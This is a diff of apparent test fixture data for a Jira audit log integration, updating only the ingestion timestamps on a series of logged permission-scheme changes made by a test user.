@@ -1201,7 +1195,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.added.to.project", - "ingested": "2021-12-08T14:50:33.590251796Z", + "ingested": "2021-12-15T09:00:40.254617497Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.266Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.added.to.project\",\"action\":\"Permission scheme added to project\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1264,7 +1258,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.removed.from.project", - "ingested": "2021-12-08T14:50:33.590254678Z", + "ingested": "2021-12-15T09:00:40.254618819Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.249Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.removed.from.project\",\"action\":\"Permission scheme removed from project\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "deletion" 
@@ -1333,7 +1327,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590257281Z", + "ingested": "2021-12-15T09:00:40.254619999Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.243Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1402,7 +1396,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590266789Z", + "ingested": "2021-12-15T09:00:40.254621286Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.241Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Start/Complete Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1471,7 +1465,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590269733Z", + "ingested": "2021-12-15T09:00:40.254622525Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.239Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1540,7 +1534,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590272430Z", + "ingested": "2021-12-15T09:00:40.254623855Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.236Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"View Development Tools\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1609,7 +1603,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590275077Z", + "ingested": "2021-12-15T09:00:40.254625130Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.235Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Transition Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1678,7 +1672,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590277891Z", + "ingested": "2021-12-15T09:00:40.254626534Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.233Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"View Read-Only Workflow\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1747,7 +1741,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590280492Z", + "ingested": "2021-12-15T09:00:40.254628174Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.231Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete All Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1821,7 +1815,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590283076Z", + "ingested": "2021-12-15T09:00:40.254629408Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.229Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Own Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1890,7 +1884,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590285661Z", + "ingested": "2021-12-15T09:00:40.254630703Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.227Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit All Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1964,7 +1958,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590288236Z", + "ingested": "2021-12-15T09:00:40.254631930Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.225Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Own Worklogs\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2033,7 +2027,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590290817Z", + "ingested": "2021-12-15T09:00:40.254633145Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.223Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Own Attachments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2102,7 +2096,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590293465Z", + "ingested": "2021-12-15T09:00:40.254634320Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.221Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete All Attachments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2176,7 +2170,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590296195Z", + "ingested": "2021-12-15T09:00:40.254636006Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.219Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Own Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2245,7 +2239,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590298766Z", + "ingested": "2021-12-15T09:00:40.254637184Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.217Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete All Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2319,7 +2313,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590301315Z", + "ingested": "2021-12-15T09:00:40.254638409Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.215Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Own Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2388,7 +2382,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590303871Z", + "ingested": "2021-12-15T09:00:40.254639618Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.212Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit All Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2462,7 +2456,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590306583Z", + "ingested": "2021-12-15T09:00:40.254640990Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.210Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Watchers\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2536,7 +2530,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590309166Z", + "ingested": "2021-12-15T09:00:40.254642170Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.208Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"View Voters and Watchers\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2605,7 +2599,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590311711Z", + "ingested": "2021-12-15T09:00:40.254643734Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.204Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Modify Reporter\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2679,7 +2673,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590314341Z", + "ingested": "2021-12-15T09:00:40.254645027Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.190Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Schedule Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2748,7 +2742,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590316909Z", + "ingested": "2021-12-15T09:00:40.254646212Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.187Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Move Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
